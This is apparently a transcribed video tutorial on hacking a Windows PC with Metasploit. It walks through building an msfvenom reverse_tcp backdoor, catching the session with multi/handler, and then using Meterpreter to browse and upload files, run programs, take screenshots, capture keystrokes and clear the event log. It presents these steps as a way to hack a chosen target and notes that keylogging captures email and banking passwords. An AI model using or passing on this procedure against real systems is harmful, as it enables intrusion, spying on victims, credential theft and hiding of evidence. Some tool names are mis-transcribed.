Can Windows be hacked? This answer is yes. There are many methods by which Windows can be hacked. One of them is the payload. In this part, I'll show you how you can hack the Windows system using the Metasploit framework, that most commonly used framework for the hackers worldwide. So let's move to the practical scenario. Open the terminal and type msfvino -p to specify the payload and use reverse_tcp payload for the Windows, -a to specify the architecture 32-bit or 64-bit, -- platform and specify the Windows, and -f to specify the extension of the backdoor file, and lhost to specify the local IP, and that you can get it from the ifconfig command. In our case, it is 192.168.0.105, and lport to specify the local port where we want the session. You can specify anything you want, and I'm going to specify 4444 here, and at last -o to specify the location where backdoor file will be exported. And process of creating backdoor has been started and file has been exported on the desktop. Now arrange to move the file on Windows system that you want to hack, and I'm going to put this file on the shared location from where I can transfer the files on the Windows system and execute it. Once it is done, go to the Windows system and copy that file from the shared location and transfer to the desktop or in any other Windows partition. Now go back to the Kali Linux and open new terminal and type the msf console and hit enter to launch it. Now type use space multi/handler and type enter. And type set payload and specify the payload that we have used during the backdoor file creation and hit enter. Now set the localhost IP and hit enter. Now set the local port, same that we have specified earlier during the backdoor creation, and type run to exploit. Now reverse TCP handler started and it's time to execute the backdoor file on the Windows system to get sessions. To do that, go to the Windows system and run the backdoor exe file and go back to the Kali Linux terminal. And you can see here one session is open and established with the 192.168.0.106 IP. To confirm the same, go to the Windows machine and open the command prompt and type the ipconfig command to view the IP address of the Windows system. As you can see here, the IP of the Windows machine is 192.168.0.106. Now go back to the Kali Linux to perform the activity remotely. Type sysinfo command to get the system's information. ls command that lists the directory content of the files and the directories. Now let's open the host file. To do that, type cd and provide the path where host file stored. Type ls command to get the list of the content stored in the etc folder. Now type the cat to view the content of the host files. Now go to the desktop by typing the cd command. Type the mkdir command to create the new folder and specify the name that you want, and go to the Windows machine to verify, and as you can see here, it is created on the desktop. Now go back to the Kali Linux and create another folder called 2222 and verify the same in the Windows system. To delete the boot folders at the same time using one command, type rmdir space 1111 space and provide another folder name 2222 here, and both folder will be deleted. Go to Windows machine and confirm. As you can see here, both has been deleted from the desktop. Now let's try to upload the file from the Kali Linux to the Windows. To do that, first create the file on the Kali Linux and enter some content and save it. Now go back to the terminal and type upload and specify the source location of the file that you want to upload and then destination file where you want to upload. It has been uploaded successfully. Now go to the Windows system and check the file and the content we have entered into the file. Now go back to the terminal and I will show you how you can execute any process remotely. So let's try to open the calculator application remotely. To do that, type the execute space -f and specify the executable file name. Here I am going to specify the calc.exe, that is executable file of the calculator, and it has been executed. Now let's check on the Windows whether it is opened or not. As you can see here, the calculator application has been opened. If you want to take a screenshot of the Windows system, type screenshot command and it will be saved on the Kali Linux system. Let's open it and check. So here it is the screenshot of the Windows machine. Now close the screen and go back to the terminal. Now type the keyscan_start command and this will capture all the keystroke of the keyboard that you type in Windows system. So go to the Windows and for the testing purpose create any text file and write it down something. Let me remove the existing content and type something here. Hey, we are checking keystroke and capturing it from the Kali Linux, and save the document and go back to the Kali Linux terminal and view the captured data by typing the keyscan_dump command. As you can see here, all the characters showing here, those we have typed in the Windows machine, and if someone try to log in using the ID and password to access email, social networking sites or banking sites, all content can be captured using this command. Key_scan command used to stop the keystroke scanning or capturing. PS command used to find out all active and running processes. Type clear EV command to clear the event log of the Windows system. Background command will show you the existing session information. Sessions command used to display all active sessions. To kill or close the session, type the session space -k and specify the session ID that you want to kill or close. As you can see here, there is no active session.